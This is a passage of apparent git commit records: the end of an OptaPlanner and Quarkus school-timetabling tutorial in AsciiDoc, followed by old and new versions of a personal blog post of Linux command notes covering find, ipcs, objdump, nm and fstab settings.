'io.quarkus:quarkus-junit5'\n\/\/}\n\/\/----\n\ninclude::..\/school-timetabling\/school-timetabling-model.adoc[leveloffset=+1]\ninclude::..\/school-timetabling\/school-timetabling-constraints.adoc[leveloffset=+1]\ninclude::..\/school-timetabling\/school-timetabling-solution.adoc[leveloffset=+1]\n\n== Create the solver service\n\nNow you are ready to put everything together and create a REST service.\nBut solving planning problems on REST threads causes HTTP timeout issues.\nTherefore, the Quarkus extension injects a `SolverManager` instance,\nwhich runs solvers in a separate thread pool\nand can solve multiple datasets in parallel.\n\nCreate the `src\/main\/java\/org\/acme\/schooltimetabling\/rest\/TimeTableResource.java` class:\n\n[source,java]\n----\npackage org.acme.schooltimetabling.rest;\n\nimport java.util.UUID;\nimport java.util.concurrent.ExecutionException;\nimport javax.inject.Inject;\nimport javax.ws.rs.POST;\nimport javax.ws.rs.Path;\n\nimport org.acme.schooltimetabling.domain.TimeTable;\nimport org.optaplanner.core.api.solver.SolverJob;\nimport org.optaplanner.core.api.solver.SolverManager;\n\n@Path(\"\/timeTable\")\npublic class TimeTableResource {\n\n @Inject\n SolverManager<TimeTable, UUID> solverManager;\n\n @POST\n @Path(\"\/solve\")\n public TimeTable solve(TimeTable problem) {\n UUID problemId = UUID.randomUUID();\n \/\/ Submit the problem to start solving\n SolverJob<TimeTable, UUID> solverJob = solverManager.solve(problemId, problem);\n TimeTable solution;\n try {\n \/\/ Wait until the solving ends\n solution = solverJob.getFinalBestSolution();\n } catch (InterruptedException | ExecutionException e) {\n throw new IllegalStateException(\"Solving failed.\", e);\n }\n return solution;\n }\n\n}\n----\n\nFor simplicity's sake, this initial implementation waits for the solver to finish,\nwhich can still cause an HTTP timeout.\nThe _complete_ implementation avoids HTTP timeouts much more elegantly.\n\n== Set the termination time\n\nWithout a termination setting or a `terminationEarly()` event, the solver runs forever.\nTo avoid that, limit the solving time to five seconds.\nThat is short enough to avoid the HTTP timeout.\n\nCreate the `src\/main\/resources\/application.properties` file:\n\n[source,properties]\n----\n# The solver runs only for 5 seconds to avoid a HTTP timeout in this simple implementation.\n# It's recommended to run for at least 5 minutes (\"5m\") otherwise.\nquarkus.optaplanner.solver.termination.spent-limit=5s\n----\n\nOptaPlanner returns _the best solution_ found in the available termination time.\nDue to xref:optimization-algorithms\/optimization-algorithms.adoc#doesPlannerFindTheOptimalSolution[the nature of NP-hard problems],\nthe best solution might not be optimal, especially for larger datasets.\nIncrease the termination time to potentially find a better solution.\n\n== Run the application\n\nFirst start the application:\n\n[source,shell]\n----\n$ mvn compile quarkus:dev\n----\n\n=== Try the application\n\nNow that the application is running, you can test the REST service.\nYou can use any REST client you wish.\nThe following example uses the Linux command `curl` to send a POST request:\n\n[source,shell]\n----\n$ curl -i -X POST http:\/\/localhost:8080\/timeTable\/solve -H \"Content-Type:application\/json\" -d '{\"timeslotList\":[{\"dayOfWeek\":\"MONDAY\",\"startTime\":\"08:30:00\",\"endTime\":\"09:30:00\"},{\"dayOfWeek\":\"MONDAY\",\"startTime\":\"09:30:00\",\"endTime\":\"10:30:00\"}],\"roomList\":[{\"name\":\"Room A\"},{\"name\":\"Room 
B\"}],\"lessonList\":[{\"id\":1,\"subject\":\"Math\",\"teacher\":\"A. Turing\",\"studentGroup\":\"9th grade\"},{\"id\":2,\"subject\":\"Chemistry\",\"teacher\":\"M. Curie\",\"studentGroup\":\"9th grade\"},{\"id\":3,\"subject\":\"French\",\"teacher\":\"M. Curie\",\"studentGroup\":\"10th grade\"},{\"id\":4,\"subject\":\"History\",\"teacher\":\"I. Jones\",\"studentGroup\":\"10th grade\"}]}'\n----\n\nAfter about five seconds, according to the termination spent time defined in your `application.properties`,\nthe service returns an output similar to the following example:\n\n[source]\n----\nHTTP\/1.1 200\nContent-Type: application\/json\n...\n\n{\"timeslotList\":...,\"roomList\":...,\"lessonList\":[{\"id\":1,\"subject\":\"Math\",\"teacher\":\"A. Turing\",\"studentGroup\":\"9th grade\",\"timeslot\":{\"dayOfWeek\":\"MONDAY\",\"startTime\":\"08:30:00\",\"endTime\":\"09:30:00\"},\"room\":{\"name\":\"Room A\"}},{\"id\":2,\"subject\":\"Chemistry\",\"teacher\":\"M. Curie\",\"studentGroup\":\"9th grade\",\"timeslot\":{\"dayOfWeek\":\"MONDAY\",\"startTime\":\"09:30:00\",\"endTime\":\"10:30:00\"},\"room\":{\"name\":\"Room A\"}},{\"id\":3,\"subject\":\"French\",\"teacher\":\"M. Curie\",\"studentGroup\":\"10th grade\",\"timeslot\":{\"dayOfWeek\":\"MONDAY\",\"startTime\":\"08:30:00\",\"endTime\":\"09:30:00\"},\"room\":{\"name\":\"Room B\"}},{\"id\":4,\"subject\":\"History\",\"teacher\":\"I. Jones\",\"studentGroup\":\"10th grade\",\"timeslot\":{\"dayOfWeek\":\"MONDAY\",\"startTime\":\"09:30:00\",\"endTime\":\"10:30:00\"},\"room\":{\"name\":\"Room B\"}}],\"score\":\"0hard\/0soft\"}\n----\n\nNotice that your application assigned all four lessons to one of the two time slots and one of the two rooms.\nAlso notice that it conforms to all hard constraints.\nFor example, M. Curie's two lessons are in different time slots.\n\nOn the server side, the `info` log shows what OptaPlanner did in those five seconds:\n\n[source,options=\"nowrap\"]\n----\n... Solving started: time spent (33), best score (-8init\/0hard\/0soft), environment mode (REPRODUCIBLE), random (JDK with seed 0).\n... Construction Heuristic phase (0) ended: time spent (73), best score (0hard\/0soft), score calculation speed (459\/sec), step total (4).\n... Local Search phase (1) ended: time spent (5000), best score (0hard\/0soft), score calculation speed (28949\/sec), step total (28398).\n... 
Solving ended: time spent (5000), best score (0hard\/0soft), score calculation speed (28524\/sec), phase total (2), environment mode (REPRODUCIBLE).\n----\n\n=== Test the application\n\nA good application includes test coverage.\n\n==== Test the constraints\n\nTo test each constraint in isolation, use a `ConstraintVerifier` in unit tests.\nIt tests each constraint's corner cases in isolation from the other tests,\nwhich lowers maintenance when adding a new constraint with proper test coverage.\n\nAdd an `optaplanner-test` dependency in your `pom.xml`:\n[source,xml]\n----\n <dependency>\n <groupId>org.optaplanner<\/groupId>\n <artifactId>optaplanner-test<\/artifactId>\n <scope>test<\/scope>\n <\/dependency>\n----\n\nCreate the `src\/test\/java\/org\/acme\/schooltimetabling\/solver\/TimeTableConstraintProviderTest.java` class:\n\n[source,java]\n----\npackage org.acme.schooltimetabling.solver;\n\nimport java.time.DayOfWeek;\nimport java.time.LocalTime;\n\nimport javax.inject.Inject;\n\nimport io.quarkus.test.junit.QuarkusTest;\nimport org.acme.schooltimetabling.domain.Lesson;\nimport org.acme.schooltimetabling.domain.Room;\nimport org.acme.schooltimetabling.domain.TimeTable;\nimport org.acme.schooltimetabling.domain.Timeslot;\nimport org.junit.jupiter.api.Test;\nimport org.optaplanner.test.api.score.stream.ConstraintVerifier;\n\n@QuarkusTest\nclass TimeTableConstraintProviderTest {\n\n private static final Room ROOM = new Room(\"Room1\");\n private static final Timeslot TIMESLOT1 = new Timeslot(DayOfWeek.MONDAY, LocalTime.of(9,0), LocalTime.NOON);\n private static final Timeslot TIMESLOT2 = new Timeslot(DayOfWeek.TUESDAY, LocalTime.of(9,0), LocalTime.NOON);\n\n @Inject\n ConstraintVerifier<TimeTableConstraintProvider, TimeTable> constraintVerifier;\n\n @Test\n void roomConflict() {\n Lesson firstLesson = new Lesson(1, \"Subject1\", \"Teacher1\", \"Group1\");\n Lesson conflictingLesson = new Lesson(2, \"Subject2\", \"Teacher2\", \"Group2\");\n Lesson nonConflictingLesson = new Lesson(3, \"Subject3\", \"Teacher3\", \"Group3\");\n\n firstLesson.setRoom(ROOM);\n firstLesson.setTimeslot(TIMESLOT1);\n\n conflictingLesson.setRoom(ROOM);\n conflictingLesson.setTimeslot(TIMESLOT1);\n\n nonConflictingLesson.setRoom(ROOM);\n nonConflictingLesson.setTimeslot(TIMESLOT2);\n\n constraintVerifier.verifyThat(TimeTableConstraintProvider::roomConflict)\n .given(firstLesson, conflictingLesson, nonConflictingLesson)\n .penalizesBy(1);\n }\n\n}\n----\n\nThis test verifies that the constraint `TimeTableConstraintProvider::roomConflict`,\nwhen given three lessons in the same room, where two lessons have the same timeslot,\npenalizes with a match weight of `1`.\nSo with a constraint weight of `10hard` it would reduce the score by `-10hard`.\n\nNotice how `ConstraintVerifier` ignores the constraint weight during testing - even\nif those constraint weights are hard coded in the `ConstraintProvider` - because\nconstraint weights change regularly before going into production.\nThis way, constraint weight tweaking does not break the unit tests.\n\n==== Test the solver\n\nIn a JUnit test, generate a test dataset and send it to the `TimeTableResource` to solve.\n\nCreate the `src\/test\/java\/org\/acme\/schooltimetabling\/rest\/TimeTableResourceTest.java` class:\n\n[source,java]\n----\npackage org.acme.schooltimetabling.rest;\n\nimport java.time.DayOfWeek;\nimport java.time.LocalTime;\nimport java.util.ArrayList;\nimport java.util.List;\n\nimport javax.inject.Inject;\n\nimport io.quarkus.test.junit.QuarkusTest;\nimport 
org.acme.schooltimetabling.domain.Room;\nimport org.acme.schooltimetabling.domain.Timeslot;\nimport org.acme.schooltimetabling.domain.Lesson;\nimport org.acme.schooltimetabling.domain.TimeTable;\nimport org.acme.schooltimetabling.rest.TimeTableResource;\nimport org.junit.jupiter.api.Test;\nimport org.junit.jupiter.api.Timeout;\n\nimport static org.junit.jupiter.api.Assertions.assertFalse;\nimport static org.junit.jupiter.api.Assertions.assertNotNull;\nimport static org.junit.jupiter.api.Assertions.assertTrue;\n\n@QuarkusTest\npublic class TimeTableResourceTest {\n\n @Inject\n TimeTableResource timeTableResource;\n\n @Test\n @Timeout(600_000)\n public void solve() {\n TimeTable problem = generateProblem();\n TimeTable solution = timeTableResource.solve(problem);\n assertFalse(solution.getLessonList().isEmpty());\n for (Lesson lesson : solution.getLessonList()) {\n assertNotNull(lesson.getTimeslot());\n assertNotNull(lesson.getRoom());\n }\n assertTrue(solution.getScore().isFeasible());\n }\n\n private TimeTable generateProblem() {\n List<Timeslot> timeslotList = new ArrayList<>();\n timeslotList.add(new Timeslot(DayOfWeek.MONDAY, LocalTime.of(8, 30), LocalTime.of(9, 30)));\n timeslotList.add(new Timeslot(DayOfWeek.MONDAY, LocalTime.of(9, 30), LocalTime.of(10, 30)));\n timeslotList.add(new Timeslot(DayOfWeek.MONDAY, LocalTime.of(10, 30), LocalTime.of(11, 30)));\n timeslotList.add(new Timeslot(DayOfWeek.MONDAY, LocalTime.of(13, 30), LocalTime.of(14, 30)));\n timeslotList.add(new Timeslot(DayOfWeek.MONDAY, LocalTime.of(14, 30), LocalTime.of(15, 30)));\n\n List<Room> roomList = new ArrayList<>();\n roomList.add(new Room(\"Room A\"));\n roomList.add(new Room(\"Room B\"));\n roomList.add(new Room(\"Room C\"));\n\n List<Lesson> lessonList = new ArrayList<>();\n lessonList.add(new Lesson(101L, \"Math\", \"B. May\", \"9th grade\"));\n lessonList.add(new Lesson(102L, \"Physics\", \"M. Curie\", \"9th grade\"));\n lessonList.add(new Lesson(103L, \"Geography\", \"M. Polo\", \"9th grade\"));\n lessonList.add(new Lesson(104L, \"English\", \"I. Jones\", \"9th grade\"));\n lessonList.add(new Lesson(105L, \"Spanish\", \"P. Cruz\", \"9th grade\"));\n\n lessonList.add(new Lesson(201L, \"Math\", \"B. May\", \"10th grade\"));\n lessonList.add(new Lesson(202L, \"Chemistry\", \"M. Curie\", \"10th grade\"));\n lessonList.add(new Lesson(203L, \"History\", \"I. Jones\", \"10th grade\"));\n lessonList.add(new Lesson(204L, \"English\", \"P. Cruz\", \"10th grade\"));\n lessonList.add(new Lesson(205L, \"French\", \"M. 
Curie\", \"10th grade\"));\n return new TimeTable(timeslotList, roomList, lessonList);\n }\n\n}\n----\n\nThis test verifies that after solving, all lessons are assigned to a time slot and a room.\nIt also verifies that it found a feasible solution (no hard constraints broken).\n\nAdd test properties to the `src\/main\/resources\/application.properties` file:\n\n[source,properties]\n----\nquarkus.optaplanner.solver.termination.spent-limit=5s\n\n# Effectively disable spent-time termination in favor of the best-score-limit\n%test.quarkus.optaplanner.solver.termination.spent-limit=1h\n%test.quarkus.optaplanner.solver.termination.best-score-limit=0hard\/*soft\n----\n\nNormally, the solver finds a feasible solution in less than 200 milliseconds.\nNotice how the `application.properties` overwrites the solver termination during tests\nto terminate as soon as a feasible solution (`0hard\/*soft`) is found.\nThis avoids hard coding a solver time, because the unit test might run on arbitrary hardware.\nThis approach ensures that the test runs long enough to find a feasible solution, even on slow machines.\nBut it does not run a millisecond longer than it strictly must, even on fast machines.\n\n=== Logging\n\nWhen adding constraints in your `ConstraintProvider`,\nkeep an eye on the _score calculation speed_ in the `info` log,\nafter solving for the same amount of time, to assess the performance impact:\n\n[source]\n----\n... Solving ended: ..., score calculation speed (29455\/sec), ...\n----\n\nTo understand how OptaPlanner is solving your problem internally,\nchange the logging in the `application.properties` file or with a `-D` system property:\n\n[source,properties]\n----\nquarkus.log.category.\"org.optaplanner\".level=debug\n----\n\nUse `debug` logging to show every _step_:\n\n[source,options=\"nowrap\"]\n----\n... Solving started: time spent (67), best score (-20init\/0hard\/0soft), environment mode (REPRODUCIBLE), random (JDK with seed 0).\n... CH step (0), time spent (128), score (-18init\/0hard\/0soft), selected move count (15), picked move ([Math(101) {null -> Room A}, Math(101) {null -> MONDAY 08:30}]).\n... CH step (1), time spent (145), score (-16init\/0hard\/0soft), selected move count (15), picked move ([Physics(102) {null -> Room A}, Physics(102) {null -> MONDAY 09:30}]).\n...\n----\n\nUse `trace` logging to show every _step_ and every _move_ per step.\n\n== Summary\n\nCongratulations!\nYou have just developed a Quarkus application with https:\/\/www.optaplanner.org\/[OptaPlanner]!\n\n== Further improvements: Database and UI integration\n\nNow try adding database and UI integration:\n\n. Store `Timeslot`, `Room`, and `Lesson` in the database with link:hibernate-orm-panache[Hibernate and Panache].\n\n. link:rest-json[Expose them through REST].\n\n. 
Adjust the `TimeTableResource` to read and write a `TimeTable` instance in a single transaction\nand use those accordingly:\n+\n[source,java]\n----\npackage org.acme.schooltimetabling.rest;\n\nimport javax.inject.Inject;\nimport javax.transaction.Transactional;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.POST;\nimport javax.ws.rs.Path;\n\nimport io.quarkus.panache.common.Sort;\nimport org.acme.schooltimetabling.domain.Lesson;\nimport org.acme.schooltimetabling.domain.Room;\nimport org.acme.schooltimetabling.domain.TimeTable;\nimport org.acme.schooltimetabling.domain.Timeslot;\nimport org.optaplanner.core.api.score.ScoreManager;\nimport org.optaplanner.core.api.score.buildin.hardsoft.HardSoftScore;\nimport org.optaplanner.core.api.solver.SolverManager;\nimport org.optaplanner.core.api.solver.SolverStatus;\n\n@Path(\"\/timeTable\")\npublic class TimeTableResource {\n\n public static final Long SINGLETON_TIME_TABLE_ID = 1L;\n\n @Inject\n SolverManager<TimeTable, Long> solverManager;\n @Inject\n ScoreManager<TimeTable, HardSoftScore> scoreManager;\n\n \/\/ To try, open http:\/\/localhost:8080\/timeTable\n @GET\n public TimeTable getTimeTable() {\n \/\/ Get the solver status before loading the solution\n \/\/ to avoid the race condition that the solver terminates between them\n SolverStatus solverStatus = getSolverStatus();\n TimeTable solution = findById(SINGLETON_TIME_TABLE_ID);\n scoreManager.updateScore(solution); \/\/ Sets the score\n solution.setSolverStatus(solverStatus);\n return solution;\n }\n\n @POST\n @Path(\"\/solve\")\n public void solve() {\n solverManager.solveAndListen(SINGLETON_TIME_TABLE_ID,\n this::findById,\n this::save);\n }\n\n public SolverStatus getSolverStatus() {\n return solverManager.getSolverStatus(SINGLETON_TIME_TABLE_ID);\n }\n\n @POST\n @Path(\"\/stopSolving\")\n public void stopSolving() {\n solverManager.terminateEarly(SINGLETON_TIME_TABLE_ID);\n }\n\n @Transactional\n protected TimeTable findById(Long id) {\n if (!SINGLETON_TIME_TABLE_ID.equals(id)) {\n throw new IllegalStateException(\"There is no timeTable with id (\" + id + \").\");\n }\n \/\/ Occurs in a single transaction, so each initialized lesson references the same timeslot\/room instance\n \/\/ that is contained by the timeTable's timeslotList\/roomList.\n return new TimeTable(\n Timeslot.listAll(Sort.by(\"dayOfWeek\").and(\"startTime\").and(\"endTime\").and(\"id\")),\n Room.listAll(Sort.by(\"name\").and(\"id\")),\n Lesson.listAll(Sort.by(\"subject\").and(\"teacher\").and(\"studentGroup\").and(\"id\")));\n }\n\n @Transactional\n protected void save(TimeTable timeTable) {\n for (Lesson lesson : timeTable.getLessonList()) {\n \/\/ TODO this is awfully naive: optimistic locking causes issues if called by the SolverManager\n Lesson attachedLesson = Lesson.findById(lesson.getId());\n attachedLesson.setTimeslot(lesson.getTimeslot());\n attachedLesson.setRoom(lesson.getRoom());\n }\n }\n\n}\n----\n+\nFor simplicity's sake, this code handles only one `TimeTable` instance,\nbut it is straightforward to enable multi-tenancy and handle multiple `TimeTable` instances of different high schools in parallel.\n+\nThe `getTimeTable()` method returns the latest timetable from the database.\nIt uses the `ScoreManager` (which is automatically injected)\nto calculate the score of that timetable, so the UI can show the score.\n+\nThe `solve()` method starts a job to solve the current timetable and store the time slot and room assignments in the database.\nIt uses the `SolverManager.solveAndListen()` method to listen to 
intermediate best solutions\nand update the database accordingly.\nThis enables the UI to show progress while the backend is still solving.\n\n. Adjust the `TimeTableResourceTest` instance accordingly, now that the `solve()` method returns immediately.\nPoll for the latest solution until the solver finishes solving:\n+\n[source,java]\n----\npackage org.acme.schooltimetabling.rest;\n\nimport javax.inject.Inject;\n\nimport io.quarkus.test.junit.QuarkusTest;\nimport org.acme.schooltimetabling.domain.Lesson;\nimport org.acme.schooltimetabling.domain.TimeTable;\nimport org.junit.jupiter.api.Test;\nimport org.junit.jupiter.api.Timeout;\nimport org.optaplanner.core.api.solver.SolverStatus;\n\nimport static org.junit.jupiter.api.Assertions.assertFalse;\nimport static org.junit.jupiter.api.Assertions.assertNotNull;\nimport static org.junit.jupiter.api.Assertions.assertTrue;\n\n@QuarkusTest\npublic class TimeTableResourceTest {\n\n @Inject\n TimeTableResource timeTableResource;\n\n @Test\n @Timeout(600_000)\n public void solveDemoDataUntilFeasible() throws InterruptedException {\n timeTableResource.solve();\n TimeTable timeTable = timeTableResource.getTimeTable();\n while (timeTable.getSolverStatus() != SolverStatus.NOT_SOLVING) {\n \/\/ Quick polling (not a Test Thread Sleep anti-pattern)\n \/\/ Test is still fast on fast machines and doesn't randomly fail on slow machines.\n Thread.sleep(20L);\n timeTable = timeTableResource.getTimeTable();\n }\n assertFalse(timeTable.getLessonList().isEmpty());\n for (Lesson lesson : timeTable.getLessonList()) {\n assertNotNull(lesson.getTimeslot());\n assertNotNull(lesson.getRoom());\n }\n assertTrue(timeTable.getScore().isFeasible());\n }\n\n}\n----\n\n. Build an attractive web UI on top of these REST methods to visualize the timetable.\n\nTake a look at {quarkusQuickstartUrl}[the quickstart source code] to see how this all turns out.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fe104b1c55f7f85c75b6bbf45df8321971f9efce","subject":"Update 2013-05-12-Linux-Notes.adoc","message":"Update 2013-05-12-Linux-Notes.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"_posts\/2013-05-12-Linux-Notes.adoc","new_file":"_posts\/2013-05-12-Linux-Notes.adoc","new_contents":"= Linux Notes\n:hp-image: penguin.png\n:author: jonny rhea\n:doctype: notes\n:encoding: utf-8\n:lang: en\n:toc: left\n:published_at: 2013-05-12\n:numbered:\n\n[index]\n== general commands\n=== find\nSearch the current dir (and below) for a file named sue:\n[source,bash]\n$ find . 
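-name sue\n\nSearch the current dir for log files larger than 10MB (an illustrative extra, not in the original notes; `-size +10M` is GNU find syntax):\n[source,bash]\n$ find . -name '*.log' -size +10M\n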
\nSearch \/tmp and \/var for files named foo*bar modified in the last week: \n[source,bash]\n$ find \/tmp \/var -mtime -7 -name foo\\*bar\n\nSearch the file system for files modified < 10 mins ago, excluding dirs and other special files:\n[source,bash]\n$ find \/ -mmin -10 -type f\n\n=== watch\nUse the watch command to monitor a process every .1 secs\n\n[source,bash]\n----\nwatch -e -n .1 'if ps cax | grep -w foo; then exit 0; else exit 1; fi'\n----\n\n[index]\n== linux system info\n\nreport file system disk space usage (human readable):\n----\n$ df -h\n----\n\nprocessor info:\n----\n$ more \/proc\/cpuinfo\n----\n\nmemory info:\n----\n$ more \/proc\/meminfo\n----\n\ncheck to see if Linux is 32-bit or 64-bit:\n----\n$ getconf LONG_BIT\n----\n\ndistribution info:\n----\n$ lsb_release -a\n----\n\nlist all packages installed:\n----\n$ dpkg -l\n----\n\nfind the 25 largest dirs starting at the current dir:\n----\n$ du -xk | sort -n | tail -25\n----\n\nshow what processes are using which ports:\n----\n$ netstat -tulpn\n----\n\n[index]\n== linux ipc\n=== ipcs\n*provides information on system inter process communication.*\n\n----\n$ ipcs\n\n------ Shared Memory Segments --------\nkey shmid owner perms bytes nattch status \n0x6112703c 32769 me 666 15600 2 \n\n------ Semaphore Arrays --------\nkey semid owner perms nsems \n\n------ Message Queues --------\nkey msqid owner perms used-bytes messages \n\n----\n\n[TIP]\n====\nuse the following options to filter the information displayed:\n\n* m => shared memory\n* q => message queues\n* s => semaphores\n====\n\nto find out what process is attached to shared memory use the -p option:\n\n----\n$ ipcs -mp\n------ Shared Memory Creator\/Last-op --------\nshmid owner cpid lpid \n32769 me 3265 3290 \n\n$ ps -ef | grep 3290\n 3290 3289 1 17:28 ? 00:00:12 \/usr\/local\/java\/bin\/java -jar ~\/foo\/foo.jar bar \n 11587 3290 3 17:41 ? 
00:00:00 ~\/foo\/bar\n----\n\n=== ipcrm\n*use this command to remove shared memory, message queue, or semaphore.*\n\nremove shared memory by id\n----\n$ ipcrm -m <shmid>\n----\n\nremove shared memory by key\n----\n$ ipcrm -M <key>\n----\n\n[index]\n== linux system configuration\ncheck and repair filesystem:\n----\n$ fsck \/dev\/sda1\n----\n\nchange the frequency of filesys checks on startup:\n----\n$ tune2fs -c <some number> \/dev\/sda1\n----\n\nto change the login manager edit:\n****\n*\/etc\/X11\/default-display-manager*\n****\n\nif your MAC address changes, edit or delete:\n****\n*\/etc\/udev\/rules.d\/70-persistent-net.rules*\n****\n\ndisable filesys checks by changing the last number in the line to 0:\n****\n*\/etc\/fstab*\n----\n# <file system> <mount point> <type> <options> <dump> <pass>\n# performs filesys check every 30 startups\n\/dev\/sda1 \/mnt\/foo ext4 defaults 0 30 \n# filesys checks disabled\n\/dev\/sdb1 \/mnt\/bar ext4 defaults 0 0\n----\n****\n\nTo grant passwordless rsh:\n****\n*hosts.equiv* +\n----\n<computer name> <user name>\n----\n****\nCreate ssh key (rsa):\n----\n$ cd ~\/.ssh\n$ ssh-keygen -t rsa\n$ ssh-add <file>\n----\n[index]\n== linux binutils\n=== objdump\n*display info from an object file(s).*\n\nbasic syntax:\n----\n$ objdump <options> file\n----\n\ndisplay the contents of the overall file header:\n----\n$ objdump -f foo\n\nfoo: file format elf32-i386\narchitecture: i386, flags 0x00000112:\nEXEC_P, HAS_SYMS, D_PAGED\nstart address 0x0804be34\n----\n\ndisplay object format specific file header contents:\n----\n$ objdump -p foo\n\nfoo: file format elf32-i386\n\nProgram Header:\n PHDR off 0x00000034 vaddr 0x08048034 paddr 0x08048034 align 2**2\n filesz 0x00000120 memsz 0x00000120 flags r-x\n INTERP off 0x00000154 vaddr 0x08048154 paddr 0x08048154 align 2**0\n filesz 0x00000013 memsz 0x00000013 flags r--\n(...)\nDynamic Section:\n NEEDED libc.so.6\n INIT 0x080494a0\n FINI 0x0805a02c\n GNU_HASH 0x080481ac\n STRTAB 0x080489b8\n(...)\nVersion References:\n required from libc.so.6:\n 0x09691f73 0x00 10 GLIBC_2.1.3\n 0x0d696912 0x00 09 GLIBC_2.2\n 0x09691a73 0x00 07 GLIBC_2.2.3\n(...)\n----\n\n=== nm\n*provides info on the symbols used in an object file or executable. by default, nm shows the symbol: value, type and name.*\n\nbasic syntax:\n----\n$ nm [file]\n----\n\n[NOTE]\n====\nif no file is provided, nm will inspect a.out\n====\n\ndisplay default information on executable (or object file):\n----\n$ nm foo\n----\n\ndisplay all the symbols in an executable, sorted by address:\n----\n$ nm -n foo\n----\n\ndisplay information about the size of a particular symbol, bar:\n----\n$ nm -S foo | grep bar\n----\n\nonly display information on external symbols:\n----\n$ nm -g foo\n----\n\n[index]\n== other utils\n=== file\n*get basic file information on a file(s).*\n\nbasic syntax:\n----\n$ file file\n----\n\nexample:\n----\n$ file foo\n\nfoo: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU\/Linux 2.6.24, stripped\n----\n","old_contents":"= Linux Notes\n:author: jonny rhea\n:doctype: notes\n:encoding: utf-8\n:lang: en\n:toc: left\n:published_at: 2013-05-12\n:numbered:\n\n[index]\n== general commands\n=== find\nSearch the current dir (and below) for a file named sue:\n[source,bash]\n$ find . 
\u2013name sue\n\nSearch \/tmp and \/var for files named foo*bar modified in the last week: \n[source,bash]\n$ find \/tmp \/var \u2013mtime -7 -name foo\\*bar\n\nSearch the file system for files modified < 10 mins ago, excluding dirs and other special files:\n[source,bash]\n$ find \/ -mmin -10 \u2013type f\n\n=== watch\nUse the watch command to monitor a process every .1 secs\n\n[source,bash]\n----\nwatch -e -n .1 'if ps cax | grep -w 'foo'; then exit 0; else exit 1; fi'\n----\n\n[index]\n== linux system info\n\nreport file system disk space usage (human readable):\n----\n$ df -h\n----\n\nprocessor info:\n----\n$ more \/proc\/cpuinfo\n----\n\nmemory info:\n----\n$ more \/proc\/meminfo\n----\n\ncheck to see if Linux is 32 or 64bit:\n----\n$ getconf LONG_BIT\n----\n\ndistribution info:\n----\n$ lsb_release\n----\n\nlist all packages installed:\n----\n$ dpkg -l\n----\n\nfind the 25 largest dirs starting at the current dir:\n----\n$ du \u2013xk |sort \u2013n |tail -25\n----\n\nshow what processes are using which ports:\n----\n$ netstat -tulpn\n----\n\n[index]\n== linux ipc\n=== ipcs\n*provides information on system inter process communication.*\n\n----\n$ ipcs\n\n------ Shared Memory Segments --------\nkey shmid owner perms bytes nattch status \n0x6112703c 32769 me 666 15600 2 \n\n------ Semaphore Arrays --------\nkey semid owner perms nsems \n\n------ Message Queues --------\nkey msqid owner perms used-bytes messages \n\n----\n\n[TIP]\n====\nuse the following options to filter the information displayed:\n\n* m => shared memory\n* q => message queues\n* s => semaphores\n====\n\nto find out what process is attached to shared memory use the -p option:\n\n----\n$ ipcs -mp\n------ Shared Memory Creator\/Last-op --------\nshmid owner cpid lpid \n32769 me 3265 3290 \n\n$ ps -ef | grep 3290\n 3290 3289 1 17:28 ? 00:00:12 \/usr\/local\/java\/bin\/java -jar ~\/foo\/foo.jar bar \n 11587 3290 3 17:41 ? 
00:00:00 ~\/foo\/bar\n----\n\n=== ipcrm\n*use this command to remove shared memory, message queue, or semaphore.*\n\nremove shared memory by id\n---\n$ ipcs -m <shmid>\n---\n\nremove shared memory by key\n---\n$ ipcs -M <key>\n---\n\n[index]\n== linux system configuration\ncheck and repair filesystem:\n----\n$ fsck \/dev\/sda1\n----\n\nchange the frequency of filesys checks on startup:\n----\n$ tune2fs \u2013c <some number> \/dev\/sda1\n----\n\nto change the login manager edit:\n****\n*\/etc\/X11\/default-display-manager*\n****\n\nif your mac address changes edit or delete:\n****\n*\/etc\/udev\/rules.d\/70-persistent-net.rules*\n****\n\ndisable filesys checks by changing the last number in line to 0:\n****\n*\/etc\/fstab*\n----\n# <file system> <mount point> <type> <options> <dump> <pass>\n# performs filesys check every 30 startups\n\/dev\/sda1 \/mnt\/foo ext4 defaults 0 30 \n# filesys checks disabled\n\/dev\/sdb1 \/mnt\/bar ext4 defaults 0 0\n----\n****\n\nTo grant passwordless rsh:\n****\n*hosts.equiv* +\n----\n<computer name> <user name>\n----\n****\nCreate ssh key (rsa):\n----\n$ cd ~\/.ssh\n$ ssh-keygen \u2013t rsa\n$ ssh-add <file>\n----\n[index]\n== linux binutils\n=== objdump\n*display info from an object file(s).*\n\nbasic syntax:\n----\n$ objdump <options> file\n----\n\ndisplay the contents of the overall file header:\n----\n$ objdump \u2013f foo\n\nfoo: file format elf32-i386\narchitecture: i386, flags 0x00000112:\nEXEC_P, HAS_SYMS, D_PAGED\nstart address 0x0804be34\n----\n\ndisplay object format specific file header contents:\n----\n$ objdump -p foo\n\nfoo: file format elf32-i386\n\nProgram Header:\n PHDR off 0x00000034 vaddr 0x08048034 paddr 0x08048034 align 2**2\n filesz 0x00000120 memsz 0x00000120 flags r-x\n INTERP off 0x00000154 vaddr 0x08048154 paddr 0x08048154 align 2**0\n filesz 0x00000013 memsz 0x00000013 flags r--\n(...)\nDynamic Section:\n NEEDED libc.so.6\n INIT 0x080494a0\n FINI 0x0805a02c\n GNU_HASH 0x080481ac\n STRTAB 0x080489b8\n(...)\nVersion References:\n required from libc.so.6:\n 0x09691f73 0x00 10 GLIBC_2.1.3\n 0x0d696912 0x00 09 GLIBC_2.2\n 0x09691a73 0x00 07 GLIBC_2.2.3\n(...)\n----\n\n=== nm\n*provides info on the symbols used in an object file or executable. 
